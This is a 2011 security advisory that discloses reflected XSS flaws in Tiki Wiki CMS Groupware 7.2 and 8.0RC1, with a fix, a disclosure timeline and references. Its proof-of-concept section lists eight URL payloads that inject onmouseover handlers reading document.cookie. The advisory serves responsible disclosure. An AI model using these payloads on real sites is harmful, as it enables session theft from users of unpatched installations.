Advisory:            Tiki Wiki CMS Groupware Multiple XSS vulnerabilities
Advisory ID:         INFOSERVE-ADV2011-01
Author:              Stefan Schurtz
Contact:             security@infoserve.de
Affected Software:   Successfully tested on Tiki 7.2 & 8.0 RC1
Vendor URL:          http://info.tiki.org/
Vendor Status:       fixed for Tiki 7 (New Tiki 6 LTS release in progress)
CVE-ID:              CVE-2011-4454, CVE-2011-4455

==========================
Vulnerability Description
==========================

All versions of Tiki 6 and Tiki 7 and version Tiki 8.0RC1 are prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

8.0RC1

http://<target>/tiki-8.0.RC1/tiki-remind_password.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-login_scr.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-8.0.RC1/tiki-index/" onmouseover="alert(document.cookie)"

7.2

http://<target>/tiki-7.2/tiki-admin_system.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-pagehistory.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-removepage.php/" onmouseover="alert(document.cookie)"
http://<target>/tiki-7.2/tiki-rename_page.php/" onmouseover="alert(document.cookie)"

=========
Solution
=========

Upgrade to Tiki 8.1 (End-of-Life for Tiki 7.x)

====================
Disclosure Timeline
====================

02-Nov-2011 - informed Security Team (security@tikiwiki.org)
03-Nov-2011 - feedback from vendor
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)

========
Credits
========

Vulnerabilities found and advisory written by the INFOSERVE Security Team

===========
References
===========

http://info.tiki.org/
http://dev.tiki.org/tiki-view_tracker_item.php?itemId=4027#content1
http://info.tiki.org/article182-Tiki-8-1-Now-Available-End-of-Life-for-Tiki-7-x
http://secunia.com/advisories/46740